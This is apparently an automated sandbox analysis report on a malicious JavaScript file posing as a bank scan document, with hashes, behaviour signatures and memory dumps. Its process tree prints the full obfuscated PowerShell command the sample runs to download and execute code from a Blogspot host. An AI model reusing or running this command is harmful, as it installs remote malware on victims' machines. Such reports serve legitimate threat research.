Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
16-01-2024 10:45
Static task
static1
Behavioral task
behavioral1
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win11-20231222-en
General
-
Target
New_ScanDoc#092387CHASEeAdvice.js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
Deletes itself 1 IoCs
Processes:
wscript.exepid process 2172 wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2232 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 2172 wrote to memory of 2232 2172 wscript.exe powershell.exe PID 2172 wrote to memory of 2232 2172 wscript.exe powershell.exe PID 2172 wrote to memory of 2232 2172 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2232-4-0x000000001B210000-0x000000001B4F2000-memory.dmpFilesize
2.9MB
-
memory/2232-5-0x0000000002410000-0x0000000002418000-memory.dmpFilesize
32KB
-
memory/2232-6-0x000007FEF5C90000-0x000007FEF662D000-memory.dmpFilesize
9.6MB
-
memory/2232-7-0x00000000025E0000-0x0000000002660000-memory.dmpFilesize
512KB
-
memory/2232-8-0x000007FEF5C90000-0x000007FEF662D000-memory.dmpFilesize
9.6MB
-
memory/2232-11-0x00000000025E0000-0x0000000002660000-memory.dmpFilesize
512KB
-
memory/2232-10-0x00000000025E0000-0x0000000002660000-memory.dmpFilesize
512KB
-
memory/2232-9-0x00000000025E0000-0x0000000002660000-memory.dmpFilesize
512KB
-
memory/2232-12-0x000007FEF5C90000-0x000007FEF662D000-memory.dmpFilesize
9.6MB